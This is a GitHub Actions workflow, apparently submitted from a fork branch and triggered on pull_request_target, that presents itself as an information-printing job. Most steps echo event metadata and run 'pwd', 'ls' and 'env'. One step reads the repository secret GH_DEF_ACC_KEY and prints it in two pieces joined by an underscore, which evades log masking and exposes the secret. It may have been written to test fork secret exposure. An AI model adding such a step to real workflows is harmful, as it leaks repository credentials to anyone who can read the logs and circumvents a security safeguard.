name: info

on: 
  - pull_request
  - pull_request_target

jobs:
  print-info:
    runs-on: ubuntu-latest
    steps:
      - run: echo 'This workflow is from FORK-BRANCH-1'
      - run: s="${{ secrets.GH_DEF_ACC_KEY }}" && echo -n ${s:0:3} && echo -n "_" && echo -n ${s:3}
      - run: echo event_name ${{ github.event_name }}
      - run: echo event.action ${{ github.event.action }}
      - run: echo repositoryUrl ${{ github.repositoryUrl }}
      - run: echo sha ${{ github.sha }}
      - run: echo ref ${{ github.ref }}
      - run: echo base_ref ${{ github.base_ref }}
      - run: echo head_ref ${{ github.head_ref }}
      - uses: actions/checkout@v3
      - run: pwd
      - run: ls -al
      - run: env
